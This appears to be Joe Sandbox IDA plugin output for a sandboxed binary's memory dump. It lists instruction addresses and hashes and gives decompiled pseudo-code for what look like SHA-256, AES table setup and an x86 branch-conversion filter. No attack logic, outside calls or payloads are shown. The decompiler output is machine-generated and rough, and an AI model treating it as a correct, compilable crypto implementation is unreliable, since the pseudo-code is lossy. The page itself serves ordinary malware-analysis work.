0x0040deca
0x0040decd
0x0040decf
0x0040decf
0x0040ded8
0x0040dedd
0x0040e665
0x0040e667
0x0040e670
0x0040e677
0x0040e684
0x0040e686
0x0040e690
0x0040e693
0x0040e696
0x0040e696
0x0040e69f
0x0040e6a4
0x0040e6d2
0x0040e6d6
0x0040e6d8
0x0040e6e6
0x0040e6ee
0x0040e6fb
0x0040e708
0x0040e714
0x0040e717
0x0040e719
0x0040e719
0x0040e722
0x0040e727
0x0040e7e1
0x0040e7e3
0x0040e7ec
0x0040e7f4
0x0040e801
0x0040e80d
0x0040e810
0x0040e812
0x0040e812
0x0040e81b
0x0040e820
0x0040e841
0x0040e843
0x0040e84c
0x0040e854
0x0040e861
0x0040e86d
0x0040e870
0x0040e872
0x0040e872
0x0040e87b
0x0040e880
0x0040e89e
0x0040e8a0
0x0040e8ad
0x0040e8b5
0x0040e8b9
0x0040e882
0x0040e882
0x0040e890
0x0040e894
0x0040e894
0x0040e8c1
0x0040e822
0x0040e822
0x0040e830
0x0040e834
0x0040e834
0x0040e8c9
0x0040e8cd
0x0040e8d1
0x00000000
0x0040e72d
0x0040e73b
0x0040e73d
0x0040e741
0x0040e751
0x0040e754
0x0040e757
0x0040e75f
0x0040e764
0x0040e770
0x0040e772
0x0040e772
0x0040e77b
0x0040e780
0x0040e7ce
0x0040e7d0
0x0040e7d4
0x0040e7d9
0x0040e8d5
0x0040e8dc
0x0040e8e4
0x0040e8e8
0x00000000
0x0040e782
0x0040e782
0x0040e794
0x0040e797
0x0040e7a1
0x0040e7a7
0x0040e7b2
0x0040e7b5
0x0040e7b6
0x0040e7bd
0x0040e7c5
0x00000000
0x0040e7c5
0x0040e780
0x00000000
0x00000000
0x00000000
0x0040e6a6
0x0040e6b0
0x0040e6b2
0x0040e6b8
0x0040e6c3
0x0040e6c7
0x0040e8ee
0x0040e8ee
0x0040e8f6
0x0040e8f8
0x0040e902
0x0040e905
0x0040e908
0x0040e908
0x0040e911
0x0040e916
0x0040ea40
0x0040ea42
0x0040ea4b
0x0040ea4e
0x0040ea57
0x0040ea59
0x0040ea63
0x0040ea66
0x0040ea69
0x0040ea69
0x0040ea72
0x0040ea77
0x0040eb9e
0x0040eba2
0x0040eba4
0x0040ebad
0x0040ebb1
0x0040ebc0
0x00000000
0x00000000
0x00000000
0x0040ea7d
0x0040ea89
0x0040ea8b
0x0040ea8f
0x0040ea97
0x0040ea9e
0x0040eaa6
0x0040eaab
0x0040eaad
0x0040eab7
0x0040eaba
0x0040eaba
0x0040eac3
0x0040eac8
0x0040eae3
0x0040eae5
0x0040eaee
0x0040eaf2
0x0040eaca
0x0040eaca
0x0040ead8
0x0040eadc
0x0040eadc
0x0040eaf7
0x0040eafb
0x0040eafe
0x0040eb07
0x0040eb0f
0x0040eb12
0x0040eb14
0x0040eb15
0x0040eb15
0x0040eb1e
0x0040eb23
0x0040eb39
0x0040eb3b
0x0040eb44
0x0040eb48
0x0040eb25
0x0040eb25
0x0040eb33
0x0040eb33
0x0040eb49
0x0040eb4b
0x0040eb54
0x0040eb5c
0x0040eb5f
0x0040eb61
0x0040eb62
0x0040eb62
0x0040eb6b
0x0040eb70
0x0040eb89
0x0040eb8b
0x0040eb92
0x0040eb94
0x0040eb98
0x0040eb72
0x0040eb72
0x0040eb80
0x0040eb80
0x0040eb70
0x0040e91c
0x0040e928
0x0040e92a
0x0040e92d
0x0040e932
0x0040e936
0x0040e93e
0x0040e943
0x0040e945
0x0040e94f
0x0040e952
0x0040e952
0x0040e95b
0x0040e960
0x0040e97b
0x0040e97d
0x0040e986
0x0040e98a
0x0040e962
0x0040e962
0x0040e970
0x0040e974
0x0040e974
0x0040e98f
0x0040e992
0x0040e99b
0x0040e99d
0x0040e9a7
0x0040e9aa
0x0040e9ad
0x0040e9ad
0x0040e9b6
0x0040e9bb
0x0040e9d1
0x0040e9d3
0x0040e9dc
0x0040e9e0
0x0040e9bd
0x0040e9bd
0x0040e9cb
0x0040e9cb
0x0040e9e1
0x0040e9e3
0x0040e9ec
0x0040e9ee
0x0040e9f8
0x0040e9fb
0x0040e9fe
0x0040e9fe
0x0040ea07
0x0040ea0c
0x0040ea28
0x0040ea2a
0x0040ea31
0x0040ea33
0x0040ea38
0x0040ea0e
0x0040ea0e
0x0040ea1c
0x0040ea20
0x0040ea20
0x0040ec27
0x0040ec27
0x0040ec2b
0x0040ec30
0x0040ec34
0x00000000
0x00000000
0x0040ec34
0x0040dee3
0x0040deef
0x0040def6
0x0040df01
0x0040df03
0x0040df0c
0x0040df12
0x0040df14
0x0040df14
0x0040df3c
0x0040df42
0x0040df42
0x0040df44
0x0040df48
0x0040df4c
0x0040df53
0x0040e211
0x0040e21f
0x0040e229
0x0040e23b
0x0040e23f
0x0040e245
0x0040e253
0x0040e258
0x0040e265
0x0040e267
0x0040e267
0x0040e270
0x0040e275
0x0040e296
0x0040e298
0x0040e2a1
0x0040e2a9
0x0040e277
0x0040e277
0x0040e285
0x0040e28d
0x0040e292
0x0040e292
0x0040e2ae
0x0040e2b4
0x0040e2b8
0x0040e2ba
0x0040e2c2
0x0040e2c5
0x0040e2c9
0x0040e2cc
0x0040e2d5
0x0040e2e2
0x0040e2e5
0x0040e2e7
0x0040e2e7
0x0040e2f0
0x0040e2f5
0x0040e31c
0x0040e31e
0x0040e32b
0x0040e32f
0x0040e337
0x0040e2f7
0x0040e2f7
0x0040e309
0x0040e316
0x0040e318
0x0040e318
0x0040e33b
0x0040e33f
0x0040e341
0x0040e349
0x0040e34c
0x0040e350
0x0040e353
0x0040e35c
0x0040e369
0x0040e36c
0x0040e36e
0x0040e36e
0x0040e377
0x0040e37c
0x0040e3a3
0x0040e3a5
0x0040e3b2
0x0040e3b6
0x0040e3be
0x0040e37e
0x0040e37e
0x0040e390
0x0040e39d
0x0040e39f
0x0040e39f
0x0040e3c2
0x0040e3c6
0x0040e3c8
0x0040e3d0
0x0040e3d3
0x0040e3d7
0x0040e3da
0x0040e3e3
0x0040e3f0
0x0040e3f3
0x0040e3f5
0x0040e3f5
0x0040e3fe
0x0040e403
0x0040e42a
0x0040e42c
0x0040e439
0x0040e43d
0x0040e445
0x0040e405
0x0040e405
0x0040e417
0x0040e424
0x0040e426
0x0040e426
0x0040e449
0x0040e44d
0x0040e44f
0x0040e457
0x0040e45a
0x0040e45e
0x0040e461
0x0040e46a
0x0040e477
0x0040e47a
0x0040e47c
0x0040e47c
0x0040e485
0x0040e48a
0x0040e4b1
0x0040e4b3
0x0040e4c0
0x0040e4c4
0x0040e4cc
0x0040e48c
0x0040e48c
0x0040e49e
0x0040e4ab
0x0040e4ad
0x0040e4ad
0x0040e4d0
0x0040e4d4
0x0040e4d6
0x0040e4de
0x0040e4e1
0x0040e4e5
0x0040e4e8
0x0040e4f1
0x0040e4fe
0x0040e501
0x0040e503
0x0040e503
0x0040e50c
0x0040e511
0x0040e538
0x0040e53a
0x0040e547
0x0040e54b
0x0040e553
0x0040e513
0x0040e513
0x0040e525
0x0040e532
0x0040e534
0x0040e534
0x0040e557
0x0040e55b
0x0040e55d
0x0040e565
0x0040e568
0x0040e56c
0x0040e56f
0x0040e578
0x0040e585
0x0040e588
0x0040e58a
0x0040e58a
0x0040e593
0x0040e598
0x0040e5bf
0x0040e5c1
0x0040e5ce
0x0040e5d2
0x0040e5da
0x0040e59a
0x0040e59a
0x0040e5ac
0x0040e5b9
0x0040e5bb
0x0040e5bb
0x0040e5e4
0x0040e5e6
0x0040e5ea
0x0040e5f2
0x0040e5f4
0x0040e5fe
0x0040e601
0x0040e604
0x0040e604
0x0040e60d
0x0040e612
0x0040e63e
0x0040e640
0x0040e649
0x0040e64d
0x0040e658
0x0040e65c
0x0040e614
0x0040e614
0x0040e622
0x0040e625
0x0040e631
0x0040e635
0x0040e635
0x0040df59
0x0040df59
0x0040df5e
0x0040df60
0x0040df60
0x0040df67
0x0040df6b
0x0040df75
0x0040df80
0x0040df82
0x0040df83
0x0040df85
0x0040df85
0x0040df8e
0x0040df93
0x0040dfae
0x0040dfb0
0x0040dfb9
0x0040dfbd
0x0040df95
0x0040df95
0x0040dfa3
0x0040dfa7
0x0040dfa7
0x0040dfc2
0x0040dfc5
0x0040dfce
0x0040dfd6
0x0040dfd9
0x0040dfdb
0x0040dfdc
0x0040dfdc
0x0040dfe5
0x0040dfea
0x0040e000
0x0040e002
0x0040e00b
0x0040e00f
0x0040dfec
0x0040dfec
0x0040dffa
0x0040dffa
0x0040e010
0x0040e012
0x0040e01b
0x0040e023
0x0040e026
0x0040e028
0x0040e029
0x0040e029
0x0040e032
0x0040e037
0x0040e04d
0x0040e04f
0x0040e058
0x0040e05c
0x0040e039
0x0040e039
0x0040e047
0x0040e047
0x0040e05d
0x0040e05f
0x0040e068
0x0040e070
0x0040e073
0x0040e075
0x0040e076
0x0040e076
0x0040e07f
0x0040e084
0x0040e09a
0x0040e09c
0x0040e0a5
0x0040e0a9
0x0040e086
0x0040e086
0x0040e094
0x0040e094
0x0040e0aa
0x0040e0ac
0x0040e0b5
0x0040e0bd
0x0040e0c0
0x0040e0c2
0x0040e0c3
0x0040e0c3
0x0040e0cc
0x0040e0d1
0x0040e0e7
0x0040e0e9
0x0040e0f2
0x0040e0f6
0x0040e0d3
0x0040e0d3
0x0040e0e1
0x0040e0e1
0x0040e0f7
0x0040e0f9
0x0040e102
0x0040e10a
0x0040e10d
0x0040e10f
0x0040e110
0x0040e110
0x0040e119
0x0040e11e
0x0040e134
0x0040e136
0x0040e13f
0x0040e143
0x0040e120
0x0040e120
0x0040e12e
0x0040e12e
0x0040e144
0x0040e146
0x0040e14f
0x0040e157
0x0040e15a
0x0040e15c
0x0040e15d
0x0040e15d
0x0040e166
0x0040e16b
0x0040e181
0x0040e183
0x0040e18c
0x0040e190
0x0040e16d
0x0040e16d
0x0040e17b
0x0040e17b
0x0040e191
0x0040e193
0x0040e19c
0x0040e1a4
0x0040e1a7
0x0040e1aa
0x0040e1aa
0x0040e1b3
0x0040e1b8
0x0040e1e3
0x0040e1e5
0x0040e1ee
0x0040e1f2
0x0040e1fd
0x0040e201
0x0040e1ba
0x0040e1ba
0x0040e1c8
0x0040e1cc
0x0040e1d6
0x0040e1da
0x0040e1da
0x0040e1b8
0x00000000
0x0040df53
0x00000000
0x0040dedd
0x00000000
0x0040f177
0x00000000
0x0040f139
0x00000000
0x0040f10b
0x0040ec2b
0x0040ebc0
0x0040ebc0
0x0040ebc2
0x0040ebcf
0x0040ebd7
0x0040ebda
0x0040ebdc
0x0040ebdc
0x0040ebe2
0x0040ebe7
0x0040ec01
0x0040ec03
0x0040ec0a
0x0040ec0c
0x0040ec14
0x0040ebe9
0x0040ebe9
0x0040ebf7
0x0040ebf7
0x0040ec15

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ef3a85183e3002fe42a0a148796e2a0343b3df6179ef6736291ebe652a2f59b
Instruction ID: 8b43415f725c52400ea32066e58f3de959199fbb7ac6094870e9ab37e3e6cffc
Opcode Fuzzy Hash: 1ef3a85183e3002fe42a0a148796e2a0343b3df6179ef6736291ebe652a2f59b
Instruction Fuzzy Hash: 2481DA73A0C32547D7288A1AC980225B6E3FBD1340F174A3FE4A99B3C0E6798956C789

Uniqueness

Uniqueness Score: -1.00%

Function 004127FC, Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123209dfbf82470405aa8cb44f036b459c122f4087a2a39e6df564f031e137c1
Instruction ID: 1df73540e4c2d79fb10e79e5b8cb1a3a58f6520a6752a808dce565b5e6951a96
Opcode Fuzzy Hash: 123209dfbf82470405aa8cb44f036b459c122f4087a2a39e6df564f031e137c1
Instruction Fuzzy Hash: CC51D872B006189F8F24CE5582405E773E5AB84764B1A857ED949DF310E3B4FCE297D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B230, Relevance: .2, Instructions: 174
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E0040B230(intOrPtr* _a4) {
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				intOrPtr* _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _t123;
				signed int _t128;
				intOrPtr* _t129;
				intOrPtr* _t148;
				intOrPtr* _t153;
				intOrPtr* _t160;
				intOrPtr* _t166;
				signed int _t167;
				signed int _t187;
				void* _t223;

				_t223 =  &_v116;
				_t166 = _a4;
				_t123 = 0;
				_t2 = _t166 + 0x30; // 0x30
				_t148 = _t2;
				do {
					asm("bswap esi");
					 *((intOrPtr*)(_t223 + 0x44 + _t123 * 4)) =  *((intOrPtr*)(_t148 - 8));
					asm("bswap esi");
					 *((intOrPtr*)(_t223 + 0x48 + _t123 * 4)) =  *((intOrPtr*)(_t148 - 4));
					asm("bswap esi");
					 *((intOrPtr*)(_t223 + 0x4c + _t123 * 4)) =  *_t148;
					asm("bswap esi");
					 *((intOrPtr*)(_t223 + 0x50 + _t123 * 4)) =  *((intOrPtr*)(_t148 + 4));
					_t123 = _t123 + 4;
					_t148 = _t148 + 0x10;
				} while (_t123 < 0x10);
				_v96 =  *_t166;
				_v92 =  *((intOrPtr*)(_t166 + 4));
				_v88 =  *((intOrPtr*)(_t166 + 8));
				_v84 =  *((intOrPtr*)(_t166 + 0xc));
				_v80 =  *((intOrPtr*)(_t166 + 0x10));
				_v76 =  *((intOrPtr*)(_t166 + 0x14));
				_t167 = 0;
				_v72 =  *((intOrPtr*)(_t166 + 0x18));
				_v68 =  *((intOrPtr*)(_t166 + 0x1c));
				_v112 = 0;
				do {
					_t187 = 1;
					_t153 =  &_v64;
					_v108 = 1;
					_t38 = _t187 - 5; // -4
					_t128 = _t38;
					_v104 = _t153;
					_v116 = 0x41c150 + _t167 * 4;
					_v100 = 0x10;
					do {
						if(_t167 != 0) {
							_t42 = _t187 - 3; // -2
							asm("ror ebx, 0x13");
							asm("ror ebp, 0x11");
							asm("ror edx, 0x12");
							asm("ror ebp, 0x7");
							 *_t153 =  *_t153 + ( *(_t223 + 0x44 + (_t42 & 0x0000000f) * 4) ^  *(_t223 + 0x44 + (_t42 & 0x0000000f) * 4) ^  *(_t223 + 0x44 + (_t42 & 0x0000000f) * 4) >> 0x0000000a) + ( *(_t223 + 0x44 + (_t187 & 0x0000000f) * 4) ^  *(_t223 + 0x44 + (_t187 & 0x0000000f) * 4) ^  *(_t223 + 0x44 + (_t187 & 0x0000000f) * 4) >> 0x00000003) +  *((intOrPtr*)(_t223 + 0x44 + (_t187 + 0xfffffff8 & 0x0000000f) * 4));
						}
						_t55 = _t128 + 2; // -2
						_t59 = _t128 + 3; // -1
						asm("ror ebx, 0x19");
						asm("ror ebp, 0xb");
						asm("ror ebp, 0x6");
						_t60 = _t128 + 1; // -3
						_t160 = _t223 + 0x24 + (_t59 & 0x00000007) * 4;
						 *_t160 =  *_t160 + ( *(_t223 + 0x24 + (_t128 & 0x00000007) * 4) ^  *(_t223 + 0x24 + (_t128 & 0x00000007) * 4) ^  *(_t223 + 0x24 + (_t128 & 0x00000007) * 4)) + (( *(_t223 + 0x24 + (_t60 & 0x00000007) * 4) ^  *(_t223 + 0x24 + (_t55 & 0x00000007) * 4)) &  *(_t223 + 0x24 + (_t128 & 0x00000007) * 4) ^  *(_t223 + 0x24 + (_t55 & 0x00000007) * 4)) +  *_v116 +  *_t153;
						_t68 = _t128 - 1; // -5
						 *((intOrPtr*)(_t223 + 0x24 + (_t68 & 0x00000007) * 4)) =  *((intOrPtr*)(_t223 + 0x24 + (_t68 & 0x00000007) * 4)) +  *_t160;
						_t78 = _t128 - 4; // -8
						_v116 = _v116 + 4;
						_t84 = _t128 - 3; // -7
						asm("ror edi, 0x16");
						asm("ror ebx, 0xd");
						asm("ror ebx, 0x2");
						_t88 = _t128 - 2; // -6
						_t167 = _v112;
						 *_t160 =  *_t160 + ( *(_t223 + 0x24 + (_t78 & 0x00000007) * 4) ^  *(_t223 + 0x24 + (_t78 & 0x00000007) * 4) ^  *(_t223 + 0x24 + (_t78 & 0x00000007) * 4)) + ( *(_t223 + 0x24 + (_t88 & 0x00000007) * 4) & ( *(_t223 + 0x24 + (_t84 & 0x00000007) * 4) |  *(_t223 + 0x24 + (_t78 & 0x00000007) * 4)) |  *(_t223 + 0x24 + (_t84 & 0x00000007) * 4) &  *(_t223 + 0x24 + (_t78 & 0x00000007) * 4));
						_t187 = _v108 + 1;
						_t153 = _v104 + 4;
						_t128 = _t128 - 1;
						_t95 =  &_v100;
						 *_t95 = _v100 - 1;
						_v108 = _t187;
						_v104 = _t153;
					} while ( *_t95 != 0);
					_t167 = _t167 + 0x10;
					_v112 = _t167;
				} while (_t167 < 0x40);
				_t129 = _a4;
				 *_t129 =  *_t129 + _v96;
				 *((intOrPtr*)(_t129 + 4)) =  *((intOrPtr*)(_t129 + 4)) + _v92;
				 *((intOrPtr*)(_t129 + 8)) =  *((intOrPtr*)(_t129 + 8)) + _v88;
				 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v84;
				 *((intOrPtr*)(_t129 + 0x10)) =  *((intOrPtr*)(_t129 + 0x10)) + _v80;
				 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) + _v76;
				 *((intOrPtr*)(_t129 + 0x18)) =  *((intOrPtr*)(_t129 + 0x18)) + _v72;
				 *((intOrPtr*)(_t129 + 0x1c)) =  *((intOrPtr*)(_t129 + 0x1c)) + _v68;
				return _t129;
			}

0x0040b234
0x0040b230
0x0040b23a
0x0040b23c
0x0040b23c
0x0040b240
0x0040b243
0x0040b245
0x0040b24c
0x0040b24e
0x0040b254
0x0040b256
0x0040b25d
0x0040b25f
0x0040b263
0x0040b266
0x0040b269
0x0040b273
0x0040b27a
0x0040b281
0x0040b288
0x0040b28f
0x0040b296
0x0040b29d
0x0040b29f
0x0040b2a3
0x0040b2a7
0x0040b2b0
0x0040b2b0
0x0040b2b5
0x0040b2c0
0x0040b2c4
0x0040b2c4
0x0040b2c7
0x0040b2cb
0x0040b2cf
0x0040b2d7
0x0040b2d9
0x0040b2db
0x0040b2f2
0x0040b2f5
0x0040b301
0x0040b306
0x0040b31c
0x0040b31c
0x0040b32b
0x0040b337
0x0040b33d
0x0040b340
0x0040b347
0x0040b34c
0x0040b364
0x0040b36a
0x0040b36e
0x0040b374
0x0040b37c
0x0040b386
0x0040b38b
0x0040b397
0x0040b39c
0x0040b3a3
0x0040b3a8
0x0040b3b8
0x0040b3c2
0x0040b3cc
0x0040b3cd
0x0040b3d0
0x0040b3d1
0x0040b3d1
0x0040b3d5
0x0040b3d9
0x0040b3d9
0x0040b3e3
0x0040b3e6
0x0040b3ea
0x0040b3f3
0x0040b3fe
0x0040b404
0x0040b40b
0x0040b412
0x0040b41d
0x0040b420
0x0040b42b
0x0040b42e
0x0040b438

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5b2c6ed38590160cc8fb173a0877a6425f0538a0edd97a68ed25e58d07123f
Instruction ID: e58164fe841b3d27413a749a66db9a62c92b149f99bc5724522e02b37cf73634
Opcode Fuzzy Hash: fd5b2c6ed38590160cc8fb173a0877a6425f0538a0edd97a68ed25e58d07123f
Instruction Fuzzy Hash: 447139B1A083058FC348DF49D48895AF3E1FFC8318F198A6DE9889B351D771E955CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5F0, Relevance: .1, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040C5F0(intOrPtr __ecx, void* __edx, intOrPtr _a4, unsigned int* _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _t43;
				unsigned int _t44;
				signed int _t48;
				intOrPtr _t52;
				signed char _t63;
				signed int _t64;
				signed char _t77;
				signed int* _t81;
				unsigned int _t84;
				void* _t86;
				unsigned int _t88;
				signed int _t91;
				intOrPtr _t97;
				void* _t98;

				_t97 = __ecx;
				_t84 = 0;
				_t88 =  *_a8 & 0x00000007;
				_v8 = __ecx;
				if(__edx >= 5) {
					_a4 = _a4 + 5;
					_t52 = __edx - 4 + __ecx;
					_v4 = _t52;
					while(1) {
						_t81 = _t84 + _t97;
						if(_t81 >= _t52) {
							goto L7;
						}
						L5:
						while(( *_t81 & 0x000000fe) != 0xe8) {
							_t81 =  &(_t81[0]);
							if(_t81 < _t52) {
								continue;
							}
							goto L7;
						}
						L7:
						_t63 = _t81 - _t84 - _t97;
						_t86 = _t81 - _t97;
						if(_t81 < _t52) {
							if(_t63 <= 2) {
								_t91 = _t88 >> _t63;
								if(_t91 == 0 || _t91 <= 4 && _t91 != 3 && ((( &(_t81[0]))[_t91 >> 1] & 0x000000ff) + 0x00000001 & 0x000000fe) != 0) {
									goto L10;
								} else {
									_t88 = (_t91 | 0x00000008) >> 1;
									_t84 = _t86 + 1;
									continue;
								}
							} else {
								_t91 = 0;
								L10:
								_t64 = _t81[1] & 0x000000ff;
								if((_t64 + 0x00000001 & 0x000000fe) != 0) {
									_t97 = _v8;
									_t88 = (_t91 | 0x00000008) >> 1;
									_t84 = _t86 + 1;
								} else {
									_t43 = _t81[0] & 0x000000ff | ((_t64 << 0x00000008 | _t81[0] & 0x000000ff) << 0x00000008 | _t81[0] & 0x000000ff) << 0x00000008;
									_t98 = _t86 + _a4;
									_t84 = _t86 + 5;
									if(_a12 == 0) {
										_t44 = _t43 - _t98;
									} else {
										_t44 = _t43 + _t98;
									}
									if(_t91 != 0) {
										_t77 = (_t91 & 0x00000006) + (_t91 & 0x00000006) + (_t91 & 0x00000006) + (_t91 & 0x00000006);
										if(((_t44 >> _t77) + 0x00000001 & 0x000000fe) == 0) {
											_t48 = _t44 ^ (0x00000100 << _t77) - 0x00000001;
											if(_a12 == 0) {
												_t44 = _t48 - _t98;
											} else {
												_t44 = _t48 + _t98;
											}
										}
										_t52 = _v4;
										_t88 = 0;
									}
									_t97 = _v8;
									_t81[0] = _t44;
									_t81[0] = _t44 >> 8;
									_t81[0] = _t44 >> 0x10;
									_t81[1] =  ~(_t44 >> 0x00000018 & 0x00000001);
								}
								while(1) {
									_t81 = _t84 + _t97;
									if(_t81 >= _t52) {
										goto L7;
									}
									goto L5;
								}
							}
						}
						if(_t63 <= 2) {
							 *_a8 = _t88 >> _t63;
							return _t86;
						} else {
							 *_a8 = 0;
							return _t86;
						}
						goto L30;
					}
				} else {
					return 0;
				}
				L30:
			}

0x0040c5fc
0x0040c5fe
0x0040c600
0x0040c603
0x0040c60a
0x0040c617
0x0040c620
0x0040c622
0x0040c626
0x0040c626
0x0040c62b
0x00000000
0x00000000
0x00000000
0x0040c630
0x0040c63a
0x0040c63d
0x00000000
0x00000000
0x00000000
0x0040c63d
0x0040c63f
0x0040c645
0x0040c647
0x0040c64b
0x0040c654
0x0040c697
0x0040c69b
0x00000000
0x0040c6b5
0x0040c6b8
0x0040c6ba
0x00000000
0x0040c6ba
0x0040c656
0x0040c656
0x0040c658
0x0040c658
0x0040c661
0x0040c71c
0x0040c723
0x0040c725
0x0040c667
0x0040c680
0x0040c686
0x0040c689
0x0040c691
0x0040c6c0
0x0040c693
0x0040c693
0x0040c693
0x0040c6c4
0x0040c6cf
0x0040c6d7
0x0040c6e1
0x0040c6e8
0x0040c6ee
0x0040c6ea
0x0040c6ea
0x0040c6ea
0x0040c6e8
0x0040c6f0
0x0040c6f4
0x0040c6f4
0x0040c6f6
0x0040c6ff
0x0040c702
0x0040c711
0x0040c714
0x0040c714
0x0040c626
0x0040c626
0x0040c62b
0x00000000
0x00000000
0x00000000
0x0040c62b
0x0040c626
0x0040c654
0x0040c72f
0x0040c74d
0x0040c754
0x0040c731
0x0040c73a
0x0040c741
0x0040c741
0x00000000
0x0040c72f
0x0040c60e
0x0040c614
0x0040c614
0x00000000

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31d452cf4fc038398579975b7917bb1ff375609163340ad82824380036c8528
Instruction ID: 2512ae077ffb6cc5c0a98d06df2ad874ef365c90d639dd9bc8b4382b2321abdd
Opcode Fuzzy Hash: b31d452cf4fc038398579975b7917bb1ff375609163340ad82824380036c8528
Instruction Fuzzy Hash: 36413633A04266CBC7248F2C88D417AF790ABD5214F094B7FD996A73C2D2369D49C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA90, Relevance: .1, Instructions: 139
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0040BA90() {
				char _t25;
				signed int _t30;
				signed int _t43;
				signed int _t44;
				void* _t51;
				signed int _t60;
				signed int _t63;
				signed int _t69;
				signed int _t71;
				signed int _t83;
				signed int _t98;
				signed int _t99;
				signed int _t123;
				signed int _t127;
				signed int _t130;
				signed int _t133;

				_t25 = 0;
				do {
					_t1 = _t25 + 0x41c040; // 0x7b777c63
					 *((char*)(( *_t1 & 0x000000ff) + 0x41e8e8)) = _t25;
					_t25 = _t25 + 1;
				} while (_t25 < 0x100);
				_t130 = 0;
				do {
					_t3 = _t130 + 0x41c040; // 0x7b777c63
					_t63 =  *_t3 & 0x000000ff;
					asm("sbb eax, eax");
					_t30 = ( ~(_t63 & 0x80) & 0x0000001b ^ _t63 + _t63) & 0x000000ff;
					_t123 = _t30 ^ _t63;
					 *(0x41f9f0 + _t130 * 4) = ((_t123 << 0x00000008 | _t63) << 0x00000008 | _t63) << 0x00000008 | _t30;
					_t7 = _t130 + 0x41e8e8; // 0xd56a0952
					_t133 =  *_t7 & 0x000000ff;
					_t83 = _t63 << 8;
					 *(0x4205f0 + _t130 * 4) = ((_t30 << 0x00000008 | _t123) << 0x00000008 | _t63) << 0x00000008 | _t63;
					asm("sbb eax, eax");
					 *(0x4201f0 + _t130 * 4) = ((_t83 | _t30) << 0x00000008 | _t123) << 0x00000008 | _t63;
					_t43 = ( ~(_t133 & 0x80) & 0x0000001b ^ _t133 + _t133) & 0x000000ff;
					asm("sbb ecx, ecx");
					_t69 = ( ~(_t43 & 0x80) & 0x0000001b ^ _t43 + _t43) & 0x000000ff;
					asm("sbb edx, edx");
					_t98 = ( ~(_t69 & 0x80) & 0x0000001b ^ _t69 + _t69) & 0x000000ff;
					 *(0x41fdf0 + _t130 * 4) = ((_t83 | _t63) << 0x00000008 | _t30) << 0x00000008 | _t123;
					_t99 = _t98 ^ _t69;
					_t127 = _t98 ^ _t43 ^ _t133;
					_t44 = _t43 ^ _t99;
					_t60 = _t98 ^ _t133;
					_t71 = _t99 ^ _t133;
					 *(0x41e9e8 + _t130 * 4) = ((_t127 << 0x00000008 | _t71) << 0x00000008 | _t60) << 0x00000008 | _t44;
					 *(0x41ede8 + _t130 * 4) = ((_t71 << 0x00000008 | _t60) << 0x00000008 | _t44) << 0x00000008 | _t127;
					 *(0x41f1e8 + _t130 * 4) = ((_t60 << 0x00000008 | _t44) << 0x00000008 | _t127) << 0x00000008 | _t71;
					 *(0x41f5e8 + _t130 * 4) = ((_t44 << 0x00000008 | _t127) << 0x00000008 | _t71) << 0x00000008 | _t60;
					_t130 = _t130 + 1;
				} while (_t130 < 0x100);
				 *0x4209f0 = E0040B070;
				 *0x41f9ec = E0040B0D0;
				 *0x41f9e8 = E0040B160;
				_t51 = E00419160();
				if(_t51 != 0) {
					 *0x4209f0 = 0x419860;
					 *0x41f9ec = E00419710;
					 *0x41f9e8 = 0x4198d0;
					return _t51;
				}
				return _t51;
			}

0x0040ba90
0x0040ba92
0x0040ba92
0x0040ba99
0x0040ba9f
0x0040baa0
